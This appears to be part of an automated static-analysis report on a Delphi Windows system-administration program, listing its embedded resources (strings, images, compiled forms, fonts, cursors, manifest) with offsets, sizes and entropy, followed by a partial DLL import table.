                                                    RT_STRING0x170eaac0x1ccdata0.5217391304347826
                                                    RT_STRING0x170ec780x200data0.51171875
                                                    RT_STRING0x170ee780x160AmigaOS bitmap font "o", fc_YSize 29696, 19968 elements, 2nd "o", 3rd0.5
                                                    RT_STRING0x170efd80x1e8data0.4098360655737705
                                                    RT_STRING0x170f1c00x1b8data0.43863636363636366
                                                    RT_STRING0x170f3780x1a4data0.45476190476190476
                                                    RT_STRING0x170f51c0x24cdata0.4965986394557823
                                                    RT_STRING0x170f7680x1bcdata0.5472972972972973
                                                    RT_STRING0x170f9240x194data0.5198019801980198
                                                    RT_STRING0x170fab80x1b4data0.463302752293578
                                                    RT_STRING0x170fc6c0x16cdata0.5274725274725275
                                                    RT_STRING0x170fdd80x13cdata0.5854430379746836
                                                    RT_STRING0x170ff140x364data0.39285714285714285
                                                    RT_STRING0x17102780x3e8data0.35
                                                    RT_STRING0x17106600x5d8data0.3689839572192513
                                                    RT_STRING0x1710c380x430data0.3880597014925373
                                                    RT_STRING0x17110680x234data0.4148936170212766
                                                    RT_STRING0x171129c0x170data0.5027173913043478
                                                    RT_STRING0x171140c0x324data0.3880597014925373
                                                    RT_STRING0x17117300x288data0.5077160493827161
                                                    RT_STRING0x17119b80x29cdata0.4311377245508982
                                                    RT_STRING0x1711c540x328data0.34405940594059403
                                                    RT_STRING0x1711f7c0x1a8data0.5141509433962265
                                                    RT_STRING0x17121240x160data0.53125
                                                    RT_STRING0x17122840x180data0.5729166666666666
                                                    RT_STRING0x17124040x198data0.46568627450980393
                                                    RT_STRING0x171259c0x1d8data0.4915254237288136
                                                    RT_STRING0x17127740x68cdata0.16646778042959426
                                                    RT_STRING0x1712e000x78cdata0.27639751552795033
                                                    RT_STRING0x171358c0x4bcdata0.382013201320132
                                                    RT_STRING0x1713a480xbcdata0.6808510638297872
                                                    RT_STRING0x1713b040x400data0.384765625
                                                    RT_STRING0x1713f040x2bcdata0.47
                                                    RT_STRING0x17141c00x3b8data0.38130252100840334
                                                    RT_STRING0x17145780x390data0.3925438596491228
                                                    RT_STRING0x17149080x250data0.4239864864864865
                                                    RT_STRING0x1714b580x1c8data0.5285087719298246
                                                    RT_STRING0x1714d200x10cdata0.5708955223880597
                                                    RT_STRING0x1714e2c0x22cdata0.47302158273381295
                                                    RT_STRING0x17150580x414data0.3716475095785441
                                                    RT_STRING0x171546c0x558data0.31505847953216376
                                                    RT_STRING0x17159c40x640data0.310625
                                                    RT_STRING0x17160040x180data0.4270833333333333
                                                    RT_STRING0x17161840xf0data0.675
                                                    RT_STRING0x17162740x214data0.4830827067669173
                                                    RT_STRING0x17164880x1bcdata0.46621621621621623
                                                    RT_STRING0x17166440x168data0.39166666666666666
                                                    RT_STRING0x17167ac0x170data0.41847826086956524
                                                    RT_STRING0x171691c0x300data0.3919270833333333
                                                    RT_STRING0x1716c1c0x3bcdata0.40690376569037656
                                                    RT_STRING0x1716fd80x438data0.3648148148148148
                                                    RT_STRING0x17174100x488data0.33879310344827585
                                                    RT_STRING0x17178980x53cdata0.27761194029850744
                                                    RT_STRING0x1717dd40x708data0.3388888888888889
                                                    RT_STRING0x17184dc0xbf0data0.23036649214659685
                                                    RT_STRING0x17190cc0x558data0.3793859649122807
                                                    RT_STRING0x17196240x438data0.3277777777777778
                                                    RT_STRING0x1719a5c0x2ccdata0.4092178770949721
                                                    RT_STRING0x1719d280x6ecdata0.18961625282167044
                                                    RT_STRING0x171a4140x864data0.14711359404096835
                                                    RT_STRING0x171ac780x864data0.13687150837988826
                                                    RT_STRING0x171b4dc0x7ccdata0.15531062124248496
                                                    RT_STRING0x171bca80x8d4data0.12654867256637167
                                                    RT_STRING0x171c57c0xa20data0.12075617283950617
                                                    RT_STRING0x171cf9c0x6d0data0.24311926605504589
                                                    RT_STRING0x171d66c0x5a0data0.3548611111111111
                                                    RT_STRING0x171dc0c0x404data0.377431906614786
                                                    RT_STRING0x171e0100x4fcdata0.35266457680250785
                                                    RT_STRING0x171e50c0x478data0.3758741258741259
                                                    RT_STRING0x171e9840x4d4data0.36326860841423947
                                                    RT_STRING0x171ee580x3a4data0.41952789699570814
                                                    RT_STRING0x171f1fc0x514data0.36230769230769233
                                                    RT_STRING0x171f7100x2f0data0.46808510638297873
                                                    RT_STRING0x171fa000x104data0.5615384615384615
                                                    RT_STRING0x171fb040x444data0.38186813186813184
                                                    RT_STRING0x171ff480x468data0.3945035460992908
                                                    RT_STRING0x17203b00x3d4data0.32653061224489793
                                                    RT_STRING0x17207840x2a8data0.4279411764705882
                                                    RT_STRING0x1720a2c0x3a0data0.4245689655172414
                                                    RT_STRING0x1720dcc0x3acdata0.4372340425531915
                                                    RT_STRING0x17211780x108data0.6477272727272727
                                                    RT_STRING0x17212800xd4data0.660377358490566
                                                    RT_STRING0x17213540x2c4data0.4251412429378531
                                                    RT_STRING0x17216180x148data0.5701219512195121
                                                    RT_STRING0x17217600x410data0.3855769230769231
                                                    RT_STRING0x1721b700x3e4data0.38755020080321284
                                                    RT_STRING0x1721f540x3e4data0.36244979919678716
                                                    RT_STRING0x17223380x3d4data0.2826530612244898
                                                    RT_STRING0x172270c0x3d0data0.4344262295081967
                                                    RT_STRING0x1722adc0x5acdata0.3367768595041322
                                                    RT_STRING0x17230880x550data0.38382352941176473
                                                    RT_STRING0x17235d80x368data0.37729357798165136
                                                    RT_STRING0x17239400x348data0.4011904761904762
                                                    RT_STRING0x1723c880x3c8data0.36260330578512395
                                                    RT_STRING0x17240500x390data0.3815789473684211
                                                    RT_STRING0x17243e00xccdata0.5392156862745098
                                                    RT_STRING0x17244ac0xb0data0.6534090909090909
                                                    RT_STRING0x172455c0x2f0data0.4601063829787234
                                                    RT_STRING0x172484c0x438data0.3212962962962963
                                                    RT_STRING0x1724c840x344data0.39593301435406697
                                                    RT_STRING0x1724fc80x2dcdata0.38114754098360654
                                                    RT_STRING0x17252a40x34cdata0.3246445497630332
                                                    RT_RCDATA0x17255f00x10data1.5
                                                    RT_RCDATA0x17256000x160RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, mono 22050 Hz0.6448863636363636
                                                    RT_RCDATA0x17257600xa852data0.12910187978649337
                                                    RT_RCDATA0x172ffb40xa43PNG image data, 86 x 37, 8-bit/color RGB, non-interlacedEnglishUnited States1.0041872858774268
                                                    RT_RCDATA0x17309f80xb39PNG image data, 1 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0038287504350853
                                                    RT_RCDATA0x17315340xb18PNG image data, 1 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0038732394366197
                                                    RT_RCDATA0x173204c0xb12PNG image data, 1 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.003881439661256
                                                    RT_RCDATA0x1732b600xb09PNG image data, 2 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0038938053097346
                                                    RT_RCDATA0x173366c0x3e10data0.46330563947633435
                                                    RT_RCDATA0x173747c0x8dPNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0354609929078014
                                                    RT_RCDATA0x173750c0x8fPNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.027972027972028
                                                    RT_RCDATA0x173759c0x8dPNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0354609929078014
                                                    RT_RCDATA0x173762c0x7032PNG image data, 1400 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0005570642712902
                                                    RT_RCDATA0x173e6600x16bPNG image data, 1 x 23, 8-bit/color RGB, non-interlacedEnglishUnited States0.8898071625344353
                                                    RT_RCDATA0x173e7cc0x73Delphi compiled form 'TAdRemCommonImagesModule'0.7739130434782608
                                                    RT_RCDATA0x173e8400x4c8Delphi compiled form 'TBackupLocatonDialog'0.49836601307189543
                                                    RT_RCDATA0x173ed080xe3ePNG image data, 81 x 29, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030170049369171
                                                    RT_RCDATA0x173fb480xe2cPNG image data, 81 x 29, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00303197353914
                                                    RT_RCDATA0x17409740xee4Delphi compiled form 'TCommonAboutDlg'0.38562434417628544
                                                    RT_RCDATA0x17418580x1dfDelphi compiled form 'TCommonSkinManager'0.6012526096033403
                                                    RT_RCDATA0x1741a380xd05Delphi compiled form 'TCommonWizardForm'0.39993999399939995
                                                    RT_RCDATA0x17427400x6b4Delphi compiled form 'TConnectDialog'0.4813519813519814
                                                    RT_RCDATA0x1742df40xbe4Delphi compiled form 'TCustomInventoryForm'0.34132720105124836
                                                    RT_RCDATA0x17439d80x2b60Delphi compiled form 'TcxCollectionEditor'0.1305835734870317
                                                    RT_RCDATA0x17465380x675Delphi compiled form 'TcxFilterDialog'0.4543254688445251
                                                    RT_RCDATA0x1746bb00x605Delphi compiled form 'TcxfmPictureEditor'0.4081765087605451
                                                    RT_RCDATA0x17471b80x4baDelphi compiled form 'TcxfmStringsEditor'0.4933884297520661
                                                    RT_RCDATA0x17476740x27f9Delphi compiled form 'TcxfmVerticalGridReportLinkDesignWindow'0.27548128603537575
                                                    RT_RCDATA0x1749e700xe250Delphi compiled form '"TcxGridLayoutViewCustomizationForm!cxGridLayoutViewCustomizationForm'0.3495581331123999
                                                    RT_RCDATA0x17580c00xbbbcDelphi compiled form '0TcxGridTableViewInplaceEditFormCustomizationForm/cxGridTableViewInplaceEditFormCustomizationForm\007Caption\006/cxGridTableViewInpla'0.3441531419059509
                                                    RT_RCDATA0x1763c7c0x12e4Delphi compiled form '"TcxGridViewLayoutCustomizationForm!cxGridViewLayoutCustomizationForm\004Left\003c\002\003Top\003\254'0.2847394540942928
                                                    RT_RCDATA0x1764f600x2925Delphi compiled form 'TDisconnectedForm'0.18152473179530998
                                                    RT_RCDATA0x17678880x9a8Delphi compiled form 'TDisksInfo'0.47249190938511326
                                                    RT_RCDATA0x17682300xf07Delphi compiled form 'TdlgEditLink'0.3519625682349883
                                                    RT_RCDATA0x17691380x61bDelphi compiled form 'TdlgListPnl'0.4523352527191299
                                                    RT_RCDATA0x17697540x4577Delphi compiled form 'TdlgRFieldsEditor'0.18759489399988755
                                                    RT_RCDATA0x176dccc0xd3fDelphi compiled form 'TdlgSubQuery'0.4606310822766146
                                                    RT_RCDATA0x176ea0c0x47d8Delphi compiled form 'TdxBarCustomCustomizationForm'0.10645933014354067
                                                    RT_RCDATA0x17731e40x22a1Delphi compiled form '\027TdxBarCustomizationForm\026dxBarCustomizationForm\004Left\003\303\002\003Top\003\253'0.2865200225606317
                                                    RT_RCDATA0x17754880x47fDelphi compiled form 'TdxBarItemAddEditor'0.45351867940920937
                                                    RT_RCDATA0x17759080x24cDelphi compiled form 'TdxBarNameEd'0.6105442176870748
                                                    RT_RCDATA0x1775b540x134Delphi compiled form 'TdxBarSubMenuEditor'0.7467532467532467
                                                    RT_RCDATA0x1775c880x7acDelphi compiled form 'TdxColorDialogForm'0.43533604887983707
                                                    RT_RCDATA0x17764340x13f3Delphi compiled form 'TdxFEFDialog'0.3403172116702565
                                                    RT_RCDATA0x17778280x1a96Delphi compiled form 'TdxfmAddComponent'0.3696738172200999
                                                    RT_RCDATA0x17792c00x6e4Delphi compiled form 'TdxfmAutoText'0.43480725623582767
                                                    RT_RCDATA0x17799a40x21c6Delphi compiled form 'TdxfmColorPalette'0.18864214665741383
                                                    RT_RCDATA0x177bb6c0x73dDelphi compiled form 'TdxfmCompositionAddItems'0.48569886670264434
                                                    RT_RCDATA0x177c2ac0xe27Delphi compiled form 'TdxfmCompositionDesignWindow'0.4131934860612752
                                                    RT_RCDATA0x177d0d40xd34Delphi compiled form 'TdxfmCPDesigner'0.4020710059171598
                                                    RT_RCDATA0x177de080x89abDelphi compiled form 'TdxfmCustomContainerDesignWindow'0.2822120704820815
                                                    RT_RCDATA0x17867b40x5d8Delphi compiled form 'TdxfmDateTimeFormats'0.4137700534759358
                                                    RT_RCDATA0x1786d8c0x895Delphi compiled form 'TdxfmDefinePrintStyles'0.4264906690942194
                                                    RT_RCDATA0x17876240x301Delphi compiled form 'TdxfmEditDescription'0.5799739921976593
                                                    RT_RCDATA0x17879280x404bDelphi compiled form 'TdxfmGridReportLinkDesignWindow'0.2392004374506349
                                                    RT_RCDATA0x178b9740xa7aDelphi compiled form 'TdxfmOptions'0.3762117822520507
                                                    RT_RCDATA0x178c3f00x79cDelphi compiled form 'TdxfmPageNumberFormat'0.4009240246406571
                                                    RT_RCDATA0x178cb8c0xdcf2Delphi compiled form 'TdxfmPageSetupDialog'0.18349775467628443
                                                    RT_RCDATA0x179a8800x5b2bDelphi compiled form 'TdxfmPreviewWdxBar'0.21449076652812887
                                                    RT_RCDATA0x17a03ac0x3480Delphi compiled form 'TdxfmPrintDialog'0.40327380952380953
                                                    RT_RCDATA0x17a382c0x31c4Delphi compiled form 'TdxfmPSReportProperties'0.3914442700156986
                                                    RT_RCDATA0x17a69f00x329eDelphi compiled form 'TdxfmReportFootnotesProperties'0.130112671708597
                                                    RT_RCDATA0x17a9c900x3292Delphi compiled form 'TdxfmReportTitleProperties'0.12969256913332303
                                                    RT_RCDATA0x17acf240xd431Delphi compiled form 'TdxfmStdPreview'0.1129397470591484
                                                    RT_RCDATA0x17ba3580x2921Delphi compiled form 'TdxfmTextReportLinkDesignWindow'0.09621046633108557
                                                    RT_RCDATA0x17bcc7c0x11902Delphi compiled form 'TdxLayoutControlCustomizeForm'0.312435708526787
                                                    RT_RCDATA0x17ce5800x15f9Delphi compiled form 'TdxLBxReportLinkDesignWindow'0.39857777777777775
                                                    RT_RCDATA0x17cfb7c0x3a35Delphi compiled form 'TdxNavBarCustomizationForm'0.23931279779880546
                                                    RT_RCDATA0x17d35b40x1595Delphi compiled form 'TdxPSPDFExportDialogForm'0.32723981900452487
                                                    RT_RCDATA0x17d4b4c0x415c8TrueType Font data, 19 tables, 1st "GPOS", 16 names, Macintosh, \(g\)\252 fonts 1999\251ElektraMediumTransType 3 MAC;Elektra;001.000;18/07/06 23:22:47ElektraVerEnglishUnited States0.10237935156133274
                                                    RT_RCDATA0x18161140x5f80TrueType Font data, 15 tables, 1st "OS/2", 21 names, UnicodeEnglishUnited States0.3445271596858639
                                                    RT_RCDATA0x181c0940xdd9Delphi compiled form 'TExplorerWizardNamespaces'0.5435825105782792
                                                    RT_RCDATA0x181ce700x28aDelphi compiled form 'TfmCreateCategory'0.5784615384615385
                                                    RT_RCDATA0x181d0fc0x31bDelphi compiled form 'TfmdxChangeFileName'0.5559748427672956
                                                    RT_RCDATA0x181d4180x899Delphi compiled form 'TfmFilterControlDialog'0.4238982280781463
                                                    RT_RCDATA0x181dcb40x13d15Delphi compiled form 'TfmZoom'0.32800315375802297
                                                    RT_RCDATA0x18319cc0x18feDelphi compiled form 'TFormatDisplayNumberDialog'0.3552672710221944
                                                    RT_RCDATA0x18332cc0x1460Delphi compiled form 'TFormatExplDialog'0.38266871165644173
                                                    RT_RCDATA0x183472c0x45bDelphi compiled form 'TfrmAddGroupItems'0.4547085201793722
                                                    RT_RCDATA0x1834b880x3da4Delphi compiled form 'TGeneralInfo'0.33105196451204055
                                                    RT_RCDATA0x183892c0x2e0Delphi compiled form 'TGlobalModule'0.5434782608695652
                                                    RT_RCDATA0x1838c0c0x3587Delphi compiled form 'TGridStylesRepositoryModule'0.10654601182222871
                                                    RT_RCDATA0x183c1940x17f3Delphi compiled form 'TGroupUserDialog'0.29913554069482956
                                                    RT_RCDATA0x183d9880x637Delphi compiled form 'THelpAssistView'0.42426147077309867
                                                    RT_RCDATA0x183dfc00x5eefbDelphi compiled form 'TImagesDM'0.6735963421188657
                                                    RT_RCDATA0x189cebc0x549Delphi compiled form 'TLayoutEditForm'0.4220251293422025
                                                    RT_RCDATA0x189d4080x369bDelphi compiled form 'TLogEventsForm'0.3240575148436941
                                                    RT_RCDATA0x18a0aa40x96eDelphi compiled form 'TLogicalDiskFrame'0.38898094449047227
                                                    RT_RCDATA0x18a14140x494Delphi compiled form 'TLoginDialog'0.48976109215017066
                                                    RT_RCDATA0x18a18a80x1c90Delphi compiled form 'TLogPropertiesDialog'0.4489879649890591
                                                    RT_RCDATA0x18a35380xb6bDelphi compiled form 'TMadExcept'0.47451248717071504
                                                    RT_RCDATA0x18a40a40x34eDelphi compiled form 'TMEContactForm'0.43498817966903075
                                                    RT_RCDATA0x18a43f40x228Delphi compiled form 'TMEDetailsForm'0.5416666666666666
                                                    RT_RCDATA0x18a461c0x2a3Delphi compiled form 'TMEScrShotForm'0.5333333333333333
                                                    RT_RCDATA0x18a48c00x1712Delphi compiled form 'TNetNeighborhoodDialog'0.3994243142566881
                                                    RT_RCDATA0x18a5fd40xc57Delphi compiled form 'TOptionsDialog'0.3308008863564419
                                                    RT_RCDATA0x18a6c2c0x3fdDelphi compiled form 'TOptionsForm'0.4926542605288932
                                                    RT_RCDATA0x18a702c0x675Delphi compiled form 'TPartitionFrame'0.32667876588021777
                                                    RT_RCDATA0x18a76a40x3c4Delphi compiled form 'TPasswordDialog'0.4678423236514523
                                                    RT_RCDATA0x18a7a680x452Delphi compiled form 'TPasswordQuery'0.5054249547920434
                                                    RT_RCDATA0x18a7ebc0x23aeDelphi compiled form 'TProcessesForm'0.2485220056930151
                                                    RT_RCDATA0x18aa26c0x17fdDelphi compiled form 'TRegisteredLogSources'0.3343103729034359
                                                    RT_RCDATA0x18aba6c0x486Delphi compiled form 'TSelectionPanel'0.4913644214162349
                                                    RT_RCDATA0x18abef40x42fDelphi compiled form 'TServicePendingProgress'0.4976657329598506
                                                    RT_RCDATA0x18ac3240x201aDelphi compiled form 'TServicePropertiesDialog'0.2905816500365052
                                                    RT_RCDATA0x18ae3400x3f49Delphi compiled form 'TServicesForm'0.3159681501141905
                                                    RT_RCDATA0x18b228c0x52bDelphi compiled form 'TShutDownDialog'0.5071806500377929
                                                    RT_RCDATA0x18b27b80x1476Delphi compiled form 'TToolBarForm'0.3432607865597556
                                                    RT_RCDATA0x18b3c300x67bDelphi compiled form 'TUserPassQuery'0.3743218806509946
                                                    RT_RCDATA0x18b42ac0x30c18Delphi compiled form 'TWinToolsMainForm'0.03343949044585987
                                                    RT_RCDATA0x18e4ec40x8a1Delphi compiled form 'TWMIExceptionDialog'0.4051607062019013
                                                    RT_RCDATA0x18e57680x6e0Delphi compiled form 'TWMIExceptionList'0.4875
                                                    RT_RCDATA0x18e5e480x18f3Delphi compiled form 'TWMIExplorerForm'0.35979333020197274
                                                    RT_RCDATA0x18e773c0x33d6Delphi compiled form '\022TWMIExplorerWizard\021WMIExplorerWizard\004Left\003\304\001\003Top\003\317'0.3212509419743783
                                                    RT_RCDATA0x18eab140x12460Delphi compiled form 'TWmiPrintExportDataModule'0.05528537836682343
                                                    RT_RCDATA0x18fcf740xc8eDelphi compiled form '\031TWmiPrintExportPreviewDlg\030WmiPrintExportPreviewDlg\004Left\002'0.3802115743621655
                                                    RT_RCDATA0x18fdc040x427Delphi compiled form 'TWMIProgressDialog'0.5785512699905927
                                                    RT_RCDATA0x18fe02c0x8099Delphi compiled form 'T_dlgDataModelEditor'0.21530330184380791
                                                    RT_RCDATA0x19060c80x55dDelphi compiled form 'T_dlgTitlesEdit'0.48434085943190097
                                                    RT_RCDATA0x19066280x5141PNG image data, 840 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0007691937887602
                                                    RT_GROUP_CURSOR0x190b76c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                    RT_GROUP_CURSOR0x190b7800x22data1.1176470588235294
                                                    RT_GROUP_CURSOR0x190b7a40x14data1.4
                                                    RT_GROUP_CURSOR0x190b7b80x22data0.9705882352941176
                                                    RT_GROUP_CURSOR0x190b7dc0x14data1.4
                                                    RT_GROUP_CURSOR0x190b7f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190b8040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190b8180x14data1.4
                                                    RT_GROUP_CURSOR0x190b82c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190b8400x14data1.4
                                                    RT_GROUP_CURSOR0x190b8540x14data1.4
                                                    RT_GROUP_CURSOR0x190b8680x14data1.4
                                                    RT_GROUP_CURSOR0x190b87c0x14data1.4
                                                    RT_GROUP_CURSOR0x190b8900x14data1.4
                                                    RT_GROUP_CURSOR0x190b8a40x14data1.4
                                                    RT_GROUP_CURSOR0x190b8b80x14data1.4
                                                    RT_GROUP_CURSOR0x190b8cc0x14data1.4
                                                    RT_GROUP_CURSOR0x190b8e00x14data1.4
                                                    RT_GROUP_CURSOR0x190b8f40x14data1.4
                                                    RT_GROUP_CURSOR0x190b9080x14data1.4
                                                    RT_GROUP_CURSOR0x190b91c0x14data1.4
                                                    RT_GROUP_CURSOR0x190b9300x14data1.4
                                                    RT_GROUP_CURSOR0x190b9440x14data1.4
                                                    RT_GROUP_CURSOR0x190b9580x14data1.4
                                                    RT_GROUP_CURSOR0x190b96c0x14data1.4
                                                    RT_GROUP_CURSOR0x190b9800x14data1.4
                                                    RT_GROUP_CURSOR0x190b9940x14data1.4
                                                    RT_GROUP_CURSOR0x190b9a80x14data1.4
                                                    RT_GROUP_CURSOR0x190b9bc0x14data1.4
                                                    RT_GROUP_CURSOR0x190b9d00x14data1.4
                                                    RT_GROUP_CURSOR0x190b9e40x14data1.4
                                                    RT_GROUP_CURSOR0x190b9f80x14data1.4
                                                    RT_GROUP_CURSOR0x190ba0c0x14data1.4
                                                    RT_GROUP_CURSOR0x190ba200x14data1.4
                                                    RT_GROUP_CURSOR0x190ba340x14data1.4
                                                    RT_GROUP_CURSOR0x190ba480x14data1.4
                                                    RT_GROUP_CURSOR0x190ba5c0x14data1.4
                                                    RT_GROUP_CURSOR0x190ba700x14data1.4
                                                    RT_GROUP_CURSOR0x190ba840x14data1.4
                                                    RT_GROUP_CURSOR0x190ba980x14data1.4
                                                    RT_GROUP_CURSOR0x190baac0x14data1.4
                                                    RT_GROUP_CURSOR0x190bac00x14data1.4
                                                    RT_GROUP_CURSOR0x190bad40x14data1.4
                                                    RT_GROUP_CURSOR0x190bae80x14data1.4
                                                    RT_GROUP_CURSOR0x190bafc0x14data1.4
                                                    RT_GROUP_CURSOR0x190bb100x14data1.4
                                                    RT_GROUP_CURSOR0x190bb240x14data1.4
                                                    RT_GROUP_CURSOR0x190bb380x14data1.25
                                                    RT_GROUP_CURSOR0x190bb4c0x14data1.4
                                                    RT_GROUP_CURSOR0x190bb600x14data1.4
                                                    RT_GROUP_CURSOR0x190bb740x14data1.4
                                                    RT_GROUP_CURSOR0x190bb880x14data1.4
                                                    RT_GROUP_CURSOR0x190bb9c0x14data1.4
                                                    RT_GROUP_CURSOR0x190bbb00x14data1.4
                                                    RT_GROUP_CURSOR0x190bbc40x14data1.4
                                                    RT_GROUP_CURSOR0x190bbd80x14data1.4
                                                    RT_GROUP_CURSOR0x190bbec0x14data1.4
                                                    RT_GROUP_CURSOR0x190bc000x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc140x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc280x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc3c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc500x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc640x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                    RT_GROUP_CURSOR0x190bc780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bc8c0x14data1.4
                                                    RT_GROUP_CURSOR0x190bca00x14data1.4
                                                    RT_GROUP_CURSOR0x190bcb40x14data1.4
                                                    RT_GROUP_CURSOR0x190bcc80x14data1.4
                                                    RT_GROUP_CURSOR0x190bcdc0x14data1.4
                                                    RT_GROUP_CURSOR0x190bcf00x14data1.4
                                                    RT_GROUP_CURSOR0x190bd040x14data1.4
                                                    RT_GROUP_CURSOR0x190bd180x14data1.4
                                                    RT_GROUP_CURSOR0x190bd2c0x14data1.4
                                                    RT_GROUP_CURSOR0x190bd400x14data1.4
                                                    RT_GROUP_CURSOR0x190bd540x14data1.4
                                                    RT_GROUP_CURSOR0x190bd680x14data1.4
                                                    RT_GROUP_CURSOR0x190bd7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bd900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                    RT_GROUP_CURSOR0x190bda40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bdb80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bdcc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bde00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x190bdf40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_ICON0x190be080xa0dataEnglishUnited States0.6375
                                                    RT_VERSION0x190bea80x394OpenPGP Secret KeyEnglishUnited States0.45524017467248906
                                                    RT_MANIFEST0x190c23c0x57aXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4514978601997147
                                                    DLLImport
                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                    advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                    user32.dllMessageBoxA, CharNextW, LoadStringW
                                                    kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                                                    kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                    user32.dllSetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExA, CreateWindowExW, wvsprintfA, wvsprintfW, keybd_event, WindowFromPoint, WindowFromDC, WinHelpW, WaitMessage, VkKeyScanW, ValidateRect, UpdateWindow, UnregisterClassW, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenuEx, TrackPopupMenu, ToUnicode, ToAsciiEx, ToAscii, TabbedTextOutA, TabbedTextOutW, SystemParametersInfoW, SubtractRect, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextA, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenuInfo, SetMenuDefaultItem, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardViewer, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutA, SendMessageTimeoutW, SendMessageA, SendMessageW, SendDlgItemMessageW, ScrollWindowEx, ScrollWindow, ScrollDC, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassA, RegisterClassW, RedrawWindow, PtInRect, PostThreadMessageA, PostThreadMessageW, PostQuitMessage, PostMessageA, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, OemToCharBuffA, OemToCharA, NotifyWinEvent, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxA, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LockWindowUpdate, LoadStringW, LoadMenuW, LoadKeyboardLayoutW, LoadImageA, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaA, IsCharAlphaW, InvalidateRgn, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowTextW, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetTabbedTextExtentA, GetTabbedTextExtentW, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageA, GetMessageW, 